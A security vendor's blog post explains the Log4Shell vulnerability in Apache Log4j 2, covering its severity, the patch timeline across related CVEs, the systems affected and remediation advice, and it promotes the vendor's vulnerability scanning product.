One out of ten systems might be affected by the critical Log4Shell vulnerability found in the Log4j version 2. The Log4shell vulnerability could be used to initiate a ransomware attack.
The Log4j vulnerability is affecting as much as one out of ten systems.
According to GitHub over 1800 repositories have a dependency on Log4j.
RCE vulnerability with the highest possible severity based on CVSS.
Can be used in ransomware attacks, crypto mining, botnets, and data extraction.
Log4Shell is a software vulnerability in Apache Log4j version 2. This vulnerability looks like hundreds of other vulnerabilities out there – but with some significant differences. This vulnerability might impact as much as one out of ten systems. Considering that this vulnerability can be exploited remotely, in combination with the number of affected systems, it’s without a question one of the most serious, if not the most serious, vulnerability we have seen in recent years. Accordingly, it requires every organization to take action proactively.
Log4j is a popular open-source Java library for logging error messages in applications. The vulnerability, published as CVE-2021-44228, enables a remote attacker to take control of a system on the internet if the device is running specific versions of Log4j 2. The actual vulnerability is called Log4Shell.
As the most widely used logging framework on the internet, organizations across the industry have integrated Apache Log4j 2 into thousands of applications. This includes major cloud services such as Apple, Google, Microsoft, Cloudflare, and platforms like Twitter and Stream.
It logs messages from software and searches for errors. The data range is broad, from basic browser and web page information to technical details about the system.
Not only can the Log4j 2 library create simple logs, but it can also execute commands to generate advanced logging information. In doing so, it can also communicate with other sources, such as internal directory services.
|December 6, 2021||CVE-2021-44228||Apache issued a patch for CVE-2021-44228, version 2.15, on December 6, 2021.|
|December 13, 2021||CVE-2021-45046||This patch left part of the vulnerability unfixed, resulting in another CVE-2021-45046.|
|December 13, 2021||Apache released a second patch on December 13, version 2.16.|
|December 17, 2021||CVE-2021-45105||Apache released a third patch, version 2.17, on December 17 to fix another related vulnerability, CVE-2021-45105.|
|December 28, 2021||CVE-2021-44832||Apache also released a fourth patch, 2.17.1, on December 28 to address another vulnerability, CVE-2021-44832.|
Log4Shell is an RCE (Remote Code Execution), meaning that anyone with access from the outside can exploit the vulnerability. In this case, they are using text messages to take control of the system. The Apache Software Foundation, which publishes the Log4j 2 library, gave the vulnerability a CVSS score of 10 out of 10, the highest-level severity score, because of its potential for widespread exploitation and the ease with which malicious cybercriminals can exploit it. While mitigation evolves and the damage unfolds, the fundamentals of the Log4Shell vulnerability won’t change.
A security researcher at Alibaba first reported the vulnerability to the Apache Foundation on November 24. They discovered the attack December 9 on servers that host the game Minecraft. After further forensic analysis, they realized cybercriminals discovered the gap earlier and have exploited it since at least December 1, 2021.
Watch this recorded webinar, featuring our CTO, Erik Torlén, and Mihail Lupan, Lead Security Engineer, to learn more about how organizations are affected by the Log4j vulnerability and how you can detect and remediate it.
Watch the webinar to learn:
Log4Shell is a zero-day vulnerability because cybercriminals likely knew about the exploit before experts did. What makes Log4Shell so dangerous is how vastly spread the Log4j 2 library is. It’s present in major platforms from vendors like AWS (Amazon Web Services) to VMware and software services large and small. The web of dependencies among affected platforms and services means patching can be a complex and possibly time-consuming process – and in many cases, not possible within a reasonable timeframe.
The ease of exploiting the vulnerability compounds its impact. The Log4j 2 library controls how applications log strings of code and information. The vulnerability enables an attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker’s control. Cybercriminals can remotely take over any internet-connected service that uses certain versions of the Log4j library anywhere in the software stack.
Because the Log4j 2 library can communicate with other sources and internal directory services, cybercriminals can easily feed Log4j 2 with malicious commands from the outside and make it download and execute dangerous code from malicious sources.
How cybercriminals can exploit Log4j 2 depends on the specifics of the affected system. So far, the vast majority of malicious activity has been mass scanning to fingerprint vulnerable systems. Cybercriminals have exploited the vulnerability to compromise virtualization infrastructure, install and execute ransomware, steal system credentials, take broad control of compromised networks, and exfiltrate data.
CVE has published three vulnerabilities related to Log4Shell. To ensure systems that use Log4j 2 are protected against these vulnerabilities, IT teams should apply the latest patch, Log4j 2.17.0, for Java 8 and up.
|CVE-2021-45105 (latest)||Left the door open for an attacker to initiate a denial-of-service attack by causing an infinite recursion loop on self-referential lookups.||Log4j 2.17.0 for Java 8 and up. This is the latest patch.|
|CVE-2021-45046 (second)||Could allow cybercriminals to craft malicious input data that could cause an information leak or remote code execution.||Log4j 2.12.2 for Java 7 and 2.16.0 for Java 8 and up.|
|CVE-2021-44228 (original)||Possible for an attacker to execute random code using the message lookup functionality.||Log4j 2.12.2 and Log4j 2.16.0.|
A vast number of software vendors are impacted. Cisco alone has hundreds of impacted software and systems. Here are some of the vendors with affected software applications:
If your application uses Log4j
Organizations that use Log4j 2 in their applications and infrastructure should update them immediately. The same applies to third-party applications. The version 2.17.0 release fully secures the library against the Log4Shell vulnerability.
If you use affected systems
Because Log4Shell affects so many systems and is easy to exploit, you need to act as soon as possible, especially when it comes to systems that are exposed out on the internet.
In environments with hundreds or thousands of systems, the first step is to identify which systems are impacted. This can be done using our vulnerability management platform. Then, if possible, patch the system. If patching is not an option, make sure the system is isolated so unauthorized users can't reach it.
Vulnerability management solution
Holm Security VMP is a modern vulnerability management solution delivering unparalleled 360-degree coverage and comprehensive insight. Detect vulnerabilities, assess risk, and prioritize remediation for every asset in your entire infrastructure.